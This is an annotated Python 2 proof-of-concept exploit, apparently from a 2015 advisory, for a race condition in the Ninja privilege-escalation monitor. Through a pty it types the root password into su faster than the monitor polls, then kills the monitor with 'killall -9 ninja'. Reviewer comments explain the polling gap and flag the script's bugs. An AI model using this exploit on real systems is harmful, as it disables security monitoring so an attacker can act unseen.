#[Title] Ninja privilege escalation detection and prevention system race condition
#[Author] Ben 'highjack' Sheppard
#[URL] http://highjack.github.io/
#[Description] There is a small delay between the time of execution of a command and the time privilege escalation is detected.
#It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected.
#The following PoC becomes root using su and issues killall -9 ninja. The attacker can then run any commands that they wish.
#[Software Link] http://forkbomb.org/ninja/
#[Date] 29/04/2015
#[Version] 0.1.3
#[Tested on] Kali Linux
#[Demo] https://www.youtube.com/watch?v=P8VJCUUJPLg
#See me hitting every open port, 'cause im banging on their system while I'm staying out of the court
#https://www.youtube.com/watch?v=eA136fOsSeQ
#
# NOTE(review): this listing was recovered from a whitespace-collapsed page; the
# line breaks and block nesting below (in particular which statements sit inside
# the `except:` branch of kill_ninja) are a best-effort reconstruction.
#
# Defender's summary of what the script demonstrates: the monitored tool polls
# the process table for privilege changes, so anything that completes its
# privileged action inside one polling interval is never seen. A polling
# process monitor cannot close that window by itself; detection that needs
# to observe every privilege transition has to hook the event at its source
# (kernel audit / LSM / execve instrumentation) rather than sample `ps`.
# The script is Python 2 (print statement); it is not valid Python 3.

import pty, os, sys, subprocess

# Module-level side effect: merely importing this file forks a new process with a
# controlling pseudo-terminal. Both the parent and the child continue executing
# everything below; `pid` is 0 in the child, the child's pid in the parent.
pid, fd = pty.fork()

#begin config
user = "root"
# Hard-coded plaintext credential; everything below is only meaningful when this
# is the real password for `user` on the host.
password= "mypassword" #change this :)
# Passed verbatim to `su -c`; it is the action that the monitor is meant to
# catch but does not, because it runs inside the polling gap.
command = "killall -9 ninja"
#end config

def usage():
    """Print the banner and the advisory header (Python 2 print statement)."""
    print """ @@@@@@@@@ @@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@ @@!@@@@@!!@@@@!@@@ @@!@@!@@@!@@ @@!!@@ !@!@!@!@!!@!!@!@!@ !@!!@!@!@!@! !@!@!! @!@!@!@!!!@!@! @!@!@@!@!@!@! !!@@!@!@!@!!@! @!@@!@! !!!@!!!!!!!!!! !!@!!!!!@!!!! !!!!!!@!!!!!!! !!@!!! !!:!!!!!::!! !!:!!:!!! !!:!!:!!!:!! !!: :!! :!:!:!:!::!: !:::!:!:!!!::!::!:!:!:!: :!:!:! :: ::: :: ::: :::::: :::::: : :::: ::: ::: ::: ::::: : : :: :: :: :: : : : ::: : : : :: :: : : ::: [Title] Ninja privilege escalation detection and prevention system 0.1.3 race condition [Author] Ben 'highjack' Sheppard [URL] http://highjack.github.io/ [Description] There is a small delay between the time of execution of a command and the time privelege escalation is detected. It is therefore possible to use a pty to run a command such as su and provide the password faster than it can be detected. The following PoC becomes root using su and issues killall -9 ninja. 
The attacker can then run any commands that they wish. """

# Counts how many times the main loop believed the monitor was still running.
# Read (not written) inside check_procs, incremented only in the loop below.
executions = 0

def check_procs():
    """Return True if `ps aux | grep root | grep /sbin/ninja` prints anything.

    Side effect: when output is non-empty and `executions` is already non-zero,
    the whole script exits with status 0 instead of returning.

    Both greps are plain substring matches on the full `ps aux` line, so the
    result is a heuristic, not a reliable process-state check. Depending on the
    invoking user it may also match the grep command lines themselves
    (presumably harmless here, but worth knowing when reading the result).
    """
    p1 = subprocess.Popen(["ps", "aux"], stdout=subprocess.PIPE)
    p2 = subprocess.Popen(["grep", "root"],stdin=p1.stdout,stdout=subprocess.PIPE)
    p3 = subprocess.Popen(["grep", "/sbin/ninja"], stdin=p2.stdout, stdout=subprocess.PIPE)
    # Only p3 is waited on; p1/p2 are left to be reaped by the interpreter.
    output = p3.communicate()[0]
    if output != "":
        if executions != 0:
            sys.exit(0)
        return True
    else:
        return False

def kill_ninja():
    """Drive the pty created by the module-level pty.fork().

    Child (pid == 0): replaces itself with `su <user> -c <command>`; if execvp
    fails, the OSError is raised outside any try block and propagates.

    Parent (pid > 0): discards up to 1024 bytes (presumably the password
    prompt), writes the configured password, discards another read, waits for
    the child, then closes the pty fd. The exit status from os.wait() is never
    inspected, so success or failure of `command` is not distinguished.

    The bare `except:` catches everything, including the OSError raised on the
    second call when `fd` has already been closed; that path prints the banner
    and a success message and exits 0 regardless of what actually happened.
    """
    if pid == 0:
        os.execvp("su", ["su", user, "-c", command])
    elif pid > 0:
        try:
            os.read(fd, 1024)
            os.write(fd, password + "\n")
            os.read(fd,1024)
            os.wait()
            os.close(fd)
        except:
            usage()
            # Printed on any exception, not on a verified outcome.
            print "[+] Ninja is terminated"
            sys.exit(0)

# Main loop. Note that `check_procs == True` compares the function object itself
# to True and is therefore always False: check_procs() is never called and the
# inner branch never runs. In the parent the observable flow is: first
# kill_ninja() drives the pty and closes fd; the second iteration's os.read on
# the closed fd raises, and the except branch exits the script.
while True:
    kill_ninja()
    if (check_procs == True):
        executions = executions + 1
        kill_ninja()